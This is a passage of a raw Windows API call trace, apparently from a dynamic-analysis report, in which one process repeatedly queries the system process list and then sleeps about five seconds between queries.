NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.784] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.791] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.800] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.807] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.815] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.822] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.829] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.836] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.843] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.852] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.861] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.870] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.877] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.884] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.891] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.897] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.903] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.910] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.918] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.935] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 